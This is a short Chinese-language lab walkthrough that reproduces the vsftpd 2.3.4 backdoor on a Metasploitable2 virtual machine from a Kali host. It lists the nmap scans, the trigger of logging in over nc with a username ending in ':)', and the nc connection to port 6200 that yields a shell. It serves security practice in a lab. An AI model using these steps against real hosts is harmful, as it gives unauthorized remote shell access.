一、准备工作
1、攻击机和靶机都处于NAT模式
2、攻击机:kali(192.168.252.131)
3、靶机:metasploitable2()
二、漏洞复现1、用nmap进行信息收集,输入nmap -sV 192.168.252.130,可以知道靶机开放了21端口,21端口提供ftp服务,ftp的版本信息是vsftpd 2.3.4
2、输入 nmap -p 6200 192.168.252.130,发现靶机的6200端口是关闭的
3、另外在打开一个终端,用nc来连接靶机的21端口。输入:nc 192.168.252.130 21,然后输入user为 a:),pass随便输。
4、再次查看靶机的6200端口,发现打开了
5、用nc连接靶机的6200端口,输入nc 192.168.252.130 6200,输入whoami